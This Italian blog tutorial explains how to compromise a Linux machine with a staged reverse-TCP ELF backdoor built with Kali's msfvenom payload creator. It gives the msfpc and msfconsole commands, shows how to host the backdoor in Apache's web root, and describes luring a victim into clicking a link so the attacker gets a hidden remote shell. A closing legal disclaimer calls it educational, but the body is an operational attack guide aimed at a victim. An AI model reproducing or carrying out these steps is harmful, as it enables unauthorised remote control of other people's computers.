In questo tutorial vi elencherò i vari passaggi necessari per hackerare un dispositivo con linux-shell-staged-reverse-tcp-443-elf. Stiamo parlando di una delle numerosissime backdoor che ci mette a disposizione Kali Linux, in particolar modo attraverso la sua piattaforma Msfvenom Payload Creator. Senza perder tempo iniziamo quindi ad entrare nelle specifiche di questo attacco.

linux-shell-staged-reverse-tcp-443-elf: i passi da compiere

Innanzitutto, per trovare l’applicazione necessaria, dovrete seguire la seguente directory: Applicazioni>Strumenti di exploiting>msfvenom payload creator; quindi startiamo l’applicazione e procediamo nel digitare questa serie di comandi elencati nelle righe sottostanti:

/usr/bin/msfpc verbose loop “indirizzo ip locale”

 

 

 

 

 

 

Dove al posto di “indirizzo IP locale” andremo ad inserire il nostro IP, ottenibile mediante il comando ifconfig su di un altro terminale.

 

 

 

 

 

 

Procediamo quindi con:

msfconsole -q -r ‘/root/linux-shell-staged-reverse-tcp-443-elf.rc’

 

 

 

 

 

 

Dopo aver eseguito questo comando sul terminale di msfvenom payload creator, recarsi nella cartella “home” e trovare la backdoor richiamata attraverso il comando precedente.

 

 

 

 

 

 

A questo punto dovremo trasferire il file dalla cartella “home” nella seguente directory:

Computer>var>www>html

 

 

 

 

 

 

Una volta fatto ciò possiamo avviare un nuovo terminale e digitare il comando “service apache2 start”

 

 

 

 

 

 

Nel frattempo il terminale di msfvenom payload creator resterà in ascolto; per captare le info della vittima dovremo prima creare un link con la seguente struttura:

“nostro IP locale”/linux-shell-staged-reverse-tcp-443.elf

Qualora la vittima cliccherà sul seguente link, il terminale in ascolto stabilirà una connessione segreta tra la vittima e il nostro PC.

 

 

 

 

 

 

Per avere uno schema completo di tutti i comandi eseguibili sul dispositivo sotto attacco, basterà digitare “help” nel terminale in ascolto.

Ricordo che questo articolo è stato creato solamente  scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.